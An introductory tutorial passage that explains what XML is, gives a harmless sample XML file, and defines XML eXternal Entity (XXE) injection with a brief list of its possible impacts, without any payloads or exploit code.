XML eXternal Entity (XXE)
XML
XML stands for eXtensible Markup Language.
Some notes about XML:
- it was designed to store and transport data
- it stores data in plaintext format (software and hardware independent way of storing, transporting and sharing data)
- it does not do anything, it contains information wrapped by tags
- XML was designed to carry data (focus on what data is); HTML which was designed to display data (focus on how data looks like)
- it does not use predefinite tags like HTML, the tags are invented from the author of the document
An example of XML file is:
<![CDATA[
<?xml version="1.0"?>
<document>
<person>Bruno Pala</person>
<web_vuln>XXE</web_vuln>
<person>Federico Loi</person>
<web_vuln>SQLI</web_vuln>
<person>Lorenzo Pisu</person>
<web_vuln>SSTI</web_vuln>
</document>
]]>
XXE
XML eXternal Entity (XXE) injections is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data.
XXE attacks can be used to:
- retrieve files
- perform SSRF (Server Side Request Forgery) attacks
- exfiltrate data out-of-band to a system that the attacker controls
- retrieve data via error messages
Some references: